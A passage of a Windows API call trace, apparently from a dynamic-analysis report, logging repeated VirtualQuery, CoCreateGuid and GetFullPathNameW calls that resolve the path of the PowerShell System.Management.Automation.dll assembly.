RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.366] VirtualQuery (in: lpAddress=0x1ab440, lpBuffer=0x1ac300, dwLength=0x30 | out: lpBuffer=0x1ac300*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.366] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.367] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.367] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.367] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.367] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xee378144, Data2=0x2105, Data3=0x405d, Data4=([0]=0xb0, [1]=0xbf, [2]=0x29, [3]=0x6c, [4]=0xae, [5]=0xa8, [6]=0xcc, [7]=0x34))) returned 0x0 [0103.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.368] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x6c5f0576, Data2=0xc0b6, Data3=0x47aa, Data4=([0]=0xbf, [1]=0x72, [2]=0xaf, [3]=0xbb, [4]=0x99, [5]=0xce, [6]=0xd5, [7]=0x78))) returned 0x0 [0103.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.371] VirtualQuery (in: lpAddress=0x1aae70, lpBuffer=0x1abd30, dwLength=0x30 | out: lpBuffer=0x1abd30*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.371] VirtualQuery (in: lpAddress=0x1aae70, lpBuffer=0x1abd30, dwLength=0x30 | out: lpBuffer=0x1abd30*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.372] VirtualQuery (in: lpAddress=0x1aaf00, lpBuffer=0x1abdc0, dwLength=0x30 | out: lpBuffer=0x1abdc0*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.372] VirtualQuery (in: lpAddress=0x1aae70, lpBuffer=0x1abd30, dwLength=0x30 | out: lpBuffer=0x1abd30*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.372] VirtualQuery (in: lpAddress=0x1aaf00, lpBuffer=0x1abdc0, dwLength=0x30 | out: lpBuffer=0x1abdc0*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.373] VirtualQuery (in: lpAddress=0x1aae70, lpBuffer=0x1abd30, dwLength=0x30 | out: lpBuffer=0x1abd30*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.373] VirtualQuery (in: lpAddress=0x1aaf00, lpBuffer=0x1abdc0, dwLength=0x30 | out: lpBuffer=0x1abdc0*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.374] VirtualQuery (in: lpAddress=0x1aae70, lpBuffer=0x1abd30, dwLength=0x30 | out: lpBuffer=0x1abd30*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.374] VirtualQuery (in: lpAddress=0x1aaf00, lpBuffer=0x1abdc0, dwLength=0x30 | out: lpBuffer=0x1abdc0*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.375] VirtualQuery (in: lpAddress=0x1aae70, lpBuffer=0x1abd30, dwLength=0x30 | out: lpBuffer=0x1abd30*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.375] VirtualQuery (in: lpAddress=0x1aaf00, lpBuffer=0x1abdc0, dwLength=0x30 | out: lpBuffer=0x1abdc0*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.376] VirtualQuery (in: lpAddress=0x1aae70, lpBuffer=0x1abd30, dwLength=0x30 | out: lpBuffer=0x1abd30*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.376] VirtualQuery (in: lpAddress=0x1aaf00, lpBuffer=0x1abdc0, dwLength=0x30 | out: lpBuffer=0x1abdc0*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.377] GetFullPathNameW (in: 